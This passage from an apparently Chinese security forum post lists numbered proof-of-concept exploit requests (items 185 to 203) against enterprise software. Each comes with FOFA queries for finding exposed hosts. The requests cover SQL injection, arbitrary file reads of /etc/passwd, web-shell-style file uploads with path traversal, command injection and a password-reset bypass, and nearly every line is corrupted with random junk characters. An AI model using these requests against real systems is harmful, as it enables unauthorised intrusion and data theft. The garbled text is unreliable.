Accept-Encoding: gzip, deflate' x. e+ o4 m% s/ H2 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
( I8 F0 K Y; L, Q4 a4 ?* |Accept: application/xml, text/xml, */*; q=0.01
3 L! S/ y' p+ t9 z }# FContent-Type: text/xml; charset=utf-8
5 N" r& S, `2 P% n+ h' a& a: MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 q* z2 p; D5 X8 V g3 t7 uX-Requested-With: XMLHttpRequest
6 s9 `+ N2 Z: U
% I5 m3 [ C. C \8 `, S# w. F6 R0 g+ L3 |5 y0 ^/ z5 Z! V5 g1 t
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')8 Q& _8 H2 f$ z- N; O
0 c# A6 N- G9 i9 H2 @% R( D
3 [8 {# z" b! j6 @7 q+ u
185. 瑞友天翼应用虚拟化系统SQL注入7 v8 v q7 s) X! Y
version < 7.0.5.15 X) p, |3 w8 t- f# _3 I
FOFA:app="REALOR-天翼应用虚拟化系统"
0 V9 [0 S" B& S. s1 jGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
/ h+ L$ _+ A3 rHost: host6 B# S7 W9 X: L' S( k! ^
: }2 j% `0 A2 B1 ?- @& n; l7 M2 h" m9 b, M
186. F-logic DataCube3 SQL注入0 @7 k! ]4 l( U0 d& o
CVE-2024-31750- Y! K, T/ A2 r- ]+ {7 ]
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统4 ~+ K* N$ F+ O; ~
FOFA:title=="DataCube3"/ k& C; h/ f; m' }2 ^. n" Z/ R2 f
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1* y& h: s% Z9 @2 Y
Host: your-ip
, P9 |/ v' k0 m; ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
4 ]* U" U8 K! U6 ?1 F+ QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
+ P! `2 `9 r7 S0 Z5 l" sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 E: f0 H4 P7 ]Accept-Encoding: gzip, deflate
3 U& h, g P7 u+ c: f# T% VConnection: close8 z% E1 q- r) X5 K- u
Content-Type: application/x-www-form-urlencoded
7 Z6 e) K- J4 }, G- b
3 |. h# U) v$ P! ^& L2 N/ Breq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
% p" y1 l5 j9 Q! K1 F. m I9 g
) ^* f+ h4 y3 n, [
6 O, d: Q* j$ A( x5 F187. Mura CMS processAsyncObject SQL注入3 \. s7 I. X7 U% j& p9 D
CVE-2024-32640
0 j1 m+ w/ x+ I' K" _6 p' q% BFOFA:"Mura CMS"" V- {$ H" p8 f, Y1 t- x+ B& K
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
; l1 c. T- j1 }* v9 G' sHost: your-ip
% N$ s! n% F: D8 o( cContent-Type: application/x-www-form-urlencoded0 J( K9 T5 ^ P8 @ {* p3 D
+ K) x& x! f8 P1 Z! l( x
- N- b8 m( v4 V% \+ D; f/ }6 Iobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
5 U P4 h9 _1 A+ q; ~
; l W9 a# |# k1 t5 h; b
! l4 Y' [ d6 \- D7 m5 C188. 叁体-佳会视频会议 attachment 任意文件读取
0 g" c( i" {, _- ~version <= 3.9.76 G# b* E0 ]# c% ^. A
FOFA:body="/system/get_rtc_user_defined_info?site_id"
1 R: v/ d3 o4 e, G5 oGET /attachment?file=/etc/passwd HTTP/1.1
: p" @' `: S; q3 xHost: your-ip
1 }; D+ F: e. K" FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ l$ v2 i5 m$ u9 g* q/ v) C$ i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 n5 o, z8 \( d$ H s: f8 K
Accept-Encoding: gzip, deflate2 }- v- H, U! n
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 R+ ~% h- ^* O- d/ K* _Connection: close0 l0 J8 g0 c1 z
2 C; S5 z5 E/ j5 c
% Y7 j& i7 d. ^* Z
189. 蓝网科技临床浏览系统 deleteStudy SQL注入$ r6 h/ d& ]# w4 u& e$ H. O) y
FOFA:app="LANWON-临床浏览系统"; X& @, h! C' U5 O* H: `5 k+ x# ?9 C
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1+ O- c$ V/ x" E+ p1 {# b
Host: your-ip" E n( t( T: N9 v9 H
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. M" J( n2 ]8 [' C# oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 ], U5 @. H2 k D7 E; N0 xAccept-Encoding: gzip, deflate
/ a" P8 D3 ^7 R) X1 \, nAccept-Language: zh-CN,zh;q=0.9
) A4 W6 C% F1 rConnection: close) V( w% s) A- P4 `9 h( Q
* n/ H+ [: ?3 D: G+ ~, ^4 r; d1 H: G% G2 l8 b3 N2 C4 _2 P+ J
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
3 n0 [3 a( ~; r, M4 u g+ e9 h) nFOFA:title=="短视频矩阵营销系统". P- A, e( d- q; F+ t, h
POST /index.php/admin/Userinfo/poihuoqu HTTP/2% p) Y/ O( \7 X. j$ z; a- L
Host: your-ip X. g3 Y& j, M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
, ~8 v8 [7 B/ g2 HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 c0 B" {) ?* X0 V1 K
Content-Type: application/x-www-form-urlencoded& D& |+ U" N7 D
Accept-Encoding: gzip, deflate
4 T- u2 e$ }0 V4 n% u4 k! b" Z; y( MAccept-Language: zh-CN,zh;q=0.9- u; R9 h+ O B" f0 y( \( B4 {
7 [4 S* l9 }; Z; r+ _: {, ~
poi=file:///etc/passwd: L# |$ t5 E6 y4 {8 J
7 n* h9 Z" m- _% j
( @, ^4 k6 T j191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
6 D0 }2 }: m* _8 r* hFOFA:body="/CDGServer3/index.jsp"
& i& \! }( E' N8 E8 vPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
# h! p. N8 l$ R+ U* N/ X8 [Host: your-ip
5 A& K8 B* S) _7 I- wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 p. |2 ~1 P2 S0 f, B
Content-Type: application/x-www-form-urlencoded
, m" M4 a' y: E v# U) j* P1 ^9 q0 x: S* Z) c, \
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=' f. r" ~/ P2 U6 J. b
* `$ g8 }3 _4 i7 {( p% y* f+ j
{, e8 c2 Z, d& R: d n2 @
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
* q* y% p# k2 r4 [4 n1 q0 pFOFA:title="用户登录_富通天下外贸ERP"
( j6 U6 S3 m L2 C# W. vPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
* M/ z! s5 q' e* A( jHost: your-ip. e+ T7 B+ }3 C- f* R# L5 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
1 f% j- `) t2 ?Content-Type: application/x-www-form-urlencoded8 D n, Y. E. L8 b
2 A' f+ L# e* E2 r) y' M6 \3 z, ]/ X* p8 Y+ G& l* w7 m4 |
<% @ webhandler language="C#" class="AverageHandler" %>
4 }/ G) G' w" `/ C- K1 i' Wusing System;# `4 l5 v2 b7 y9 J, L
using System.Web;) q. U% o: d8 J, d/ B
public class AverageHandler : IHttpHandler
4 k7 t+ C* R, G, o{9 F9 k9 Q4 u+ Q* R
public bool IsReusable
. M, G4 B. ~; d/ A: @{ get { return true; } }' D P& @: }7 E
public void ProcessRequest(HttpContext ctx)& e) B, J5 l" j# F, Y n0 f' t
{
7 @ F" Z( z/ s& t! S2 }0 M% t3 Qctx.Response.Write("test");, X; ` L1 M2 B
}
% H* F+ q6 A+ B" d$ j/ Q}0 J+ q2 o( S: ?6 K* x$ i9 _
( f; l4 a+ p: u
6 ^- u/ ]$ H" a) c9 I* F
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行/ p: Z- X6 S$ U8 o# d; h* L9 M
FOFA:body="山石云鉴主机安全管理系统": Y) \( |& A0 L( X
GET /master/ajaxActions/getTokenAction.php HTTP/1.10 g$ M2 O2 J. ]2 ~* u j% Y
Host:0 G* f% ]1 I$ Z: A
Cookie: PHPSESSID=2333333333333;
6 S2 {* [( Z: r$ v7 x6 g7 k* dContent-Type: application/x-www-form-urlencoded
- _- M7 J3 I0 ^8 C9 L. eUser-Agent: Mozilla/5.0
8 o- X4 I1 c% e. X V( y. l
' h/ c1 o0 G: J3 b" i% z- V) B9 [& Y, E% G
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
5 r/ P; D8 r0 T% k% g5 ]: BHost:
9 ?5 X7 Y F/ D9 }3 e. cUser-Agent: Mozilla/5.08 m5 A+ A- B3 q% q8 t
Accept-Encoding: gzip, deflate
8 k1 |4 v X7 ?2 I) k* [* o4 s* HAccept: */*
$ a6 c2 Q8 |& h% FConnection: close+ u1 R# j O6 v0 h
Cookie: PHPSESSID=2333333333333;: q4 a7 E$ a& a/ H* W7 Q
Content-Type: application/x-www-form-urlencoded
! b% q" J+ ~9 l% ZContent-Length: 84
6 _" A: Y( L" Q, z$ \, u2 I- Y3 K& }. E& {5 p
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
$ k$ g4 T1 ]$ e2 Z4 M u
! d3 z+ Y2 p/ Y2 _7 o5 @' `; G4 }+ l* B8 e) V
GET /master/img/config HTTP/1.1
9 ]$ [7 ]& y. _Host:4 s/ C7 O; [, p$ z8 ]! h0 H
User-Agent: Mozilla/5.08 a6 I( S. p8 g/ [3 r* o
' _3 v V9 D6 P; ~& W& c# F& L
( Y" y6 C8 z, x a( Q$ Y8 _
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传6 i) l9 A' c8 J- a- m& q4 L# N
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在) x+ _" ?6 C: a6 l
) T6 o* R. M! l9 zPOST /servlet/uploadAttachmentServlet HTTP/1.1* Q+ n7 |8 Y4 {/ a
Host: host
) w; ?' `" s& c+ m! V# P) WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36; \+ m6 d+ n% D- ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: \0 Y% |- o: u i' X0 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" |2 G' \% h8 V n
Accept-Encoding: gzip, deflate1 t5 q0 z. Y/ i0 A
Connection: close
8 A% j$ U) g% y. m6 b, |, OContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk# k2 F; J; k; S" i$ R; `( k* q
------WebKitFormBoundaryKNt0t4vBe8cX9rZk" z" M6 f! ]3 ^
7 z2 ]* B* j. B8 |0 t+ m( Q
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
! U" I5 _9 u/ R; `! ^. ?Content-Type: text/plain
( c: q0 L( S0 a3 B0 b& t<% out.println("hello");%>4 W' | g g( z% q
------WebKitFormBoundaryKNt0t4vBe8cX9rZk, z" h3 E* K* D4 T o- p
Content-Disposition: form-data; name="json"
: w0 t0 y' J+ e* u' P {"iq":{"query":{"UpdateType":"mail"}}}5 r" m4 T& u. s
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
3 P: s' `$ Z. _$ Y( }8 z) r, G. ?0 v, S
8 @! u! p- e9 s5 I8 }1 A195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
/ H+ g2 w( Y7 PFOFA:title=="飞鱼星企业级智能上网行为管理系统
4 B$ ^" n# C i2 \" e" \POST /send_order.cgi?parameter=operation HTTP/1.1
/ D. |5 K8 u: M# n, ] e8 tHost: 127.0.0.1: ~" i' E% B8 y7 s# N
Pragma: no-cache; k, e" w- g& E. @5 H
Cache-Control: no-cache, s+ s2 e1 I1 p- g9 E3 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36( @0 d7 x( Y! Y
Accept: */*
- J3 B& Q/ _% V& E% e- T5 bAccept-Encoding: gzip, deflate9 `5 d/ x' V+ K
Accept-Language: zh-CN,zh;q=0.9
* H& w! t' W8 N0 UConnection: close( y. K; F0 W9 Y, y+ X7 t
Content-Type: application/x-www-form-urlencoded) x( ]4 Y4 K: K# q8 C, A3 x
Content-Length: 681 [' {( i( v+ Q9 D5 l! N6 F
8 k9 x y# I) F! N9 r8 D
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}8 o3 Q/ y/ y* l1 M1 W' p- ]
5 M8 U( j' X0 e/ K* Q: s; Z7 Z
. T' Y0 u$ X7 G Y196. 河南省风速科技统一认证平台密码重置
j$ W. T! _ aFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
% A/ o0 G, p# l- qPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
$ R2 N( k$ e @( u" N) O% s% g XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 E8 ]( j3 }, [
Content-Type: application/json;charset=UTF-8
! a) l6 f- _% P o f1 L, Z) eX-Requested-With: XMLHttpRequest
. Y8 V3 k% ~* x' K. {Host:& C+ S2 }3 B- C, K4 O6 ~! U
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
( |8 j6 o* r0 k* B; VContent-Length: 45
2 ]( } q, r8 kConnection: close
0 ?" I5 S$ c7 ~9 k4 P! F
, s) i2 ~/ z6 S$ M) p8 U- b{"xgh":"test","newPass":"test666","email":""}
7 `% Z7 w" T" V( `1 Z& h! m; `+ ?5 D' @% C; w% U a
# X$ [' u& ^+ ^8 \5 m! |# p l
, g+ S+ m% ~, N) d8 o197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
/ W ?! }3 v4 t; t! u' HFOFA:app="浙大恩特客户资源管理系统"% k1 B" I- H$ j1 `* Y
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1# b6 C4 R" }/ z( s, D8 Z1 z
Host:
" }2 Q. ~4 G9 b* ^* ~0 uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
% W7 T) z4 l7 ?- uAccept-Encoding: gzip, deflate& _, q% ]2 ]/ x( G# s
Connection: close
& R; x! U7 | d/ W1 r! F. k; ?2 C5 C, ]% F. ~
. L3 {% c$ j W6 |8 ~: R
6 Q8 L7 Q0 ?: ?# G198. 阿里云盘 WebDAV 命令注入
! P7 j7 c6 E; i. \' oCVE-2024-296403 `$ x% @; a0 d1 r. j% C4 R
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.16 x3 P2 k/ o9 O: Q0 L, T' ?
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64& q5 H/ ?- z0 w; I
Accept: */*
% C3 l; |! r8 |- \Accept-Encoding: gzip, deflate
9 B0 c* L+ i: M' R, D% cAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.63 C; |4 H+ y0 \; D% t4 p
Connection: close4 o2 d5 h2 S$ U: g
! z2 B$ H# P1 Z* K+ O p
2 z J, O% S- z( n# f199. cockpit系统assetsmanager_upload接口 文件上传( C4 ^8 C' I- Z8 L3 g5 N: S3 G
' H; |0 h/ p i2 U+ L, C
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
, t; X% A; g* s; f6 ]1 {& j) wGET /auth/login?to=/ HTTP/1.1: m/ I6 k7 E5 k1 k7 O+ ^/ [
) N7 e& ?' f: b4 B响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw") Z3 d, c [1 A( A% J, I: W2 G
& G0 H. v1 V& d+ L& _; K) G2.使用刚才上一步获取到的jwt获取cookie:' c+ l ]6 G$ G% D# ]
. G! V* X; _* D$ i! t5 T! g, S
POST /auth/check HTTP/1.1- W! r' h t2 `% W/ J1 E
Content-Type: application/json% @) m/ v1 \3 J$ O+ i* p4 V8 D
, A7 T, G$ c n0 `3 x D* F
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
; V3 q5 ~! `( A! a( H6 P, M9 D$ t$ i( e9 V# b9 t8 q
响应:200,返回值:
3 q& x2 o& a' L* ^) i eSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
9 _/ R/ w: c7 z% i& ]4 YFofa:title="Authenticate Please!"7 B+ a- D& ~4 R0 N" Q
POST /assetsmanager/upload HTTP/1.1: u8 B0 G4 f2 j) l3 O
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
4 f- f i/ v, r3 ^ mCookie: mysession=95524f01e238bf51bb60d77ede3bea92
7 h9 e, l8 |) X- F' W2 O
* q/ z# R( Z; _- X-----------------------------36D28FBc36bd6feE7Fb3
$ n5 I; t) ~2 f& {Content-Disposition: form-data; name="files[]"; filename="tttt.php"
" Q5 p2 V& A( dContent-Type: text/php* [7 e# C, @2 L9 `
5 R* x4 q8 Y/ f1 D$ U/ T! W<?php echo "tttt";unlink(__FILE__);?>
: X# t' H- K9 n1 y-----------------------------36D28FBc36bd6feE7Fb3
, m2 \$ {0 x3 r2 c4 c% WContent-Disposition: form-data; name="folder"
% H+ \# n9 X* S q X
& r; d4 ?) W7 {1 z+ n; O-----------------------------36D28FBc36bd6feE7Fb3--- Y5 N q: Y1 \) @ K7 y a, [
' m2 _7 Y. D* T) J! L1 A& H, Y- t5 y* ^5 F8 [* C: R7 I
/storage/uploads/tttt.php+ Z$ L0 T/ J4 W. o( H1 f$ l
" ]. z+ R* h; R% `1 w) e* o
200. SeaCMS海洋影视管理系统dmku SQL注入1 G5 V h/ w1 k% S; _' Y
FOFA:app="海洋CMS"
" N) z: b. ~8 C+ E f7 mGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
) f( C. |8 E; `8 d* iCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
7 ^7 Z7 y# {5 K S' BUpgrade-Insecure-Requests: 12 S" ?1 ]9 R7 k0 c0 P
Cache-Control: max-age=0% s' s! s) m: J, F( D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 M7 X% r& u2 j w: a+ ]7 v
Accept-Encoding: gzip, deflate( \3 `$ N; A/ L& f4 D% k
Accept-Language: zh-CN,zh;q=0.9, i" L+ o2 E, C
& w* g& K" [: s' H0 l9 y, s
- }' T- Q [& Z0 H3 L
201. 方正全媒体新闻采编系统 binary SQL注入
! M; U2 [+ E9 n. b* GFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"1 O5 S! J# G6 [
POST /newsedit/newsplan/task/binary.do HTTP/1.11 W% i7 A6 X) b2 z! F8 P6 P
Content-Type: application/x-www-form-urlencoded
) l% k- F. {( N9 D; r; EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 W" c- Y( r$ s% W \" b5 |4 e- ^
Accept-Encoding: gzip, deflate
5 q. I2 l- D7 ^8 gAccept-Language: zh-CN,zh;q=0.9
7 R4 i$ d0 A! C' IConnection: close
: d: w. J7 u' ^, a( a" K; _
/ Y5 S+ X8 ]1 j' w8 f: n) vTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1: H8 d9 K# }* z' S; T+ ]9 l0 l
$ j) K6 I% T- ]1 R E, R, l; @; P4 Y! v- C4 ]
202. 微擎系统 AccountEdit任意文件上传) g; _1 D, c0 |; ]. G
FOFA:body="/Widgets/WidgetCollection/"1 B7 }* O. V7 S1 J6 b6 q6 _
获取__VIEWSTATE和__EVENTVALIDATION值
0 \- V2 c9 z5 K* s0 u, d- E s* aGET /User/AccountEdit.aspx HTTP/1.1
! H" {8 Q& t2 Z$ ]# ?" {Host: 滑板人之家
/ D( h! Z { v' gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.310 D- W# H0 _+ A$ A% g* O* [
Content-Length: 0
% I/ L, p* z. o7 a1 }& |; m+ W x$ W3 @4 B% \+ y4 r! y
9 Q8 t I2 P4 Z1 h+ r
替换__VIEWSTATE和__EVENTVALIDATION值; y3 G% {: S" v4 z m% P
POST /User/AccountEdit.aspx HTTP/1.1
- N/ e) |' [8 `+ B6 @+ WAccept-Encoding: gzip, deflate, br) q; v( p8 Q/ u$ W# }
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
# t8 [1 t5 H# t
' r9 A. x# S$ X# D' J# N-----------------------------786435874t385875938657365873465673587356875 [* j# Y# v1 b! f$ ]/ E
Content-Disposition: form-data; name="__VIEWSTATE" Y6 r- ?3 }) W) o" G4 M
9 a* T+ @7 h: ?/ l$ K5 ~
__VIEWSTATE$ N8 ^6 z' S! q6 P" `
-----------------------------786435874t385875938657365873465673587356870 i0 x, r; H0 F4 o
Content-Disposition: form-data; name="__EVENTVALIDATION"
% E0 v( j+ i3 n! E5 d, h
5 N5 p! J0 n1 S4 e9 O3 d__EVENTVALIDATION
' x/ m3 M# U" R& L4 U-----------------------------786435874t385875938657365873465673587356874 p( s* b1 L j! ?
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"+ N7 d2 O* Z" |9 _$ W: r$ n+ X; {
Content-Type: text/plain
9 V. C, [2 N, Q# G, q, r# w' S
3 q' `* f! D1 W2 _4 XHello World!/ r0 ~3 x$ L3 Y( L" S! i1 w
-----------------------------786435874t38587593865736587346567358735687
8 U" O# p/ j- ~$ W: nContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"4 A$ @3 Z0 T- Z% `2 |
8 T: u, d+ N! J. L4 C+ n* V3 U$ H/ B% n上传图片
' c* q! H& @6 M x-----------------------------786435874t38587593865736587346567358735687
0 k" F. u+ J) kContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"6 q. {& J% l: z) ^4 M! E, L, _
5 l3 [5 u6 S8 X( W' W
- e5 t" o5 }$ P' \9 Y' h-----------------------------786435874t38587593865736587346567358735687% |" K) j0 X* R6 f. a% T
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"' |7 N R* X; A- G
- W; r0 j1 x7 T$ }2 J8 t
. a1 X& n( v9 L' n-----------------------------786435874t38587593865736587346567358735687--
* k% Z0 x9 O- X9 d. q9 ~& {
+ d" n! v( e9 u9 m4 z
( u& ^; i0 N4 a2 @! r. @! j8 I/_data/Uploads/1123.txt
6 ^3 ^5 T2 L4 m% A) K5 p: [8 X$ K
203. 红海云EHR PtFjk 文件上传
- c7 Q. s- B, ^0 s9 cFOFA:body="RedseaPlatform"
/ n0 m; W* X8 l' G6 Y. UPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
( Q9 d1 o! R4 s: B7 b( l, uHost: x.x.x.x0 e8 V5 D- |- f0 v
Accept-Encoding: gzip
4 S% ]3 {- e/ _ o" ]: i9 N% o1 s @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- `7 |& C4 v( n) D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
* `, ^8 g T& F6 S. UContent-Length: 210
# ^1 o$ K* e& e7 y& y: ~ v; ~8 K$ Q1 K1 I# f4 L. u
------WebKitFormBoundaryt7WbDl1tXogoZys4 ^5 n5 k- C1 w
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"6 A( _0 _) X& Q% {, m- G! X
Content-Type:image/jpeg
0 F9 N. R( U0 l- h
# j1 d0 y) j& x9 b; |" V# l<% out.print("hello,eHR");%>% L* I+ k! \* O- e$ p9 l
------WebKitFormBoundaryt7WbDl1tXogoZys4--
, ^7 D3 Z; J1 Z1 V
4 `, ?8 w( r4 K5 ^ 7 h7 `7 f7 w" E' J$ z
$ J1 l5 ?3 B0 {# R
1 Z/ v9 ]6 j/ Q# N( S1 J8 D" ]% @9 \7 c7 A" e
3 T* {. @# h3 Q8 w& } |
发表于 2024-6-5 14:31:29
收藏
支持
反对